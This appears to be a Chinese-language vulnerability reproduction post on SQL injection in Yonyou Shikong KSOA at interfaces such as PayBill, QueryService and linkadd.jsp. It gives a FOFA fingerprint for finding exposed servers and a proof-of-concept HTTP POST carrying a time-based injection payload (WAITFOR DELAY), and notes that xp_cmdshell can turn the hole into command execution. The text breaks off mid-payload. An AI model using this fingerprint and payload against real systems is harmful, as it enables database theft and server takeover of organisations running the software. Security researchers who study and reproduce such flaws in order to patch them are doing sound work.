用友时空 KSOA 多处SQL注入漏洞复现

0x01 产品简介

用友时空 KSOA 是建立在 SOA 理念指导下研发的新一代产品，是根据流通企业前沿的 IT 需求推出的统一的IT基础架构，它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。

0x02 漏洞概述

用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞，攻击者可通过这些漏洞获取数据库权限 ,启用xp_cmdshell 可执行任意命令获取服务器权限。

0x03 复现环境

FOFA：body="οnmοuseοut=\"this.classname='btn btnOff'\""

0x04 漏洞复现

PoC-1

POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1';WAITFOR DELAY '0:0:5'--</name><name>